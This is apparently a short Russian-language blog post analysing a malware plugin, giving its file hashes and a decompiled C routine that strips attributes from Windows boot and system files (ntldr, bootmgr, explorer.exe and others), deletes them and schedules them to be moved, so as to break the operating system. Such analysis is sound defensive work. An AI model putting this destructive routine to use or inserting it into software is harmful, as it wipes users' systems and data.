Наверняка разработка этого плагина велась под лозунгом: "Не наврежу, но нагажу" =) Особо тут смотреть не на что, но да все равно
MD5: 20f73f9765e592960f3f373788560ce4
SHA1: bf4e2c0f858210f3a4fcd74034bf87d1fefb915a
SHA256: ee8afff4b7d8cb851fc893c1913bfe56b89c11864be6faad561ae7947cf7bff6
signed int __cdecl Start()
{
unsigned int index; // edi@1
const CHAR *fName; // esi@2
LPCSTR filesTable; // [sp+8h] [bp-18h]@1
int v4; // [sp+Ch] [bp-14h]@1
int v5; // [sp+10h] [bp-10h]@1
int v6; // [sp+14h] [bp-Ch]@1
int v7; // [sp+18h] [bp-8h]@1
int v8; // [sp+1Ch] [bp-4h]@1
filesTable = "c:\\ntldr";
v4 = (int)"c:\\ntdetect.com";
v5 = (int)"c:\\bootmgr";
v6 = (int)"c:\\loadmgr";
v7 = (int)"c:\\windows\\explorer.exe";
v8 = (int)"c:\\osloader.exe";
index = 0;
do
{
fName = (&filesTable)[4 * index];
SetFileAttributesA((&filesTable)[4 * index], FILE_ATTRIBUTE_NORMAL);
DeleteFileA(fName);
MoveFileExA(fName, "c:\\boots", 4u);
++index;
}
while ( index < 6 );
return 1;
}
Плагин тупо пытается уничтожить файло чтобы нарушить нормальную работу OS
Комментариев нет:
Отправить комментарий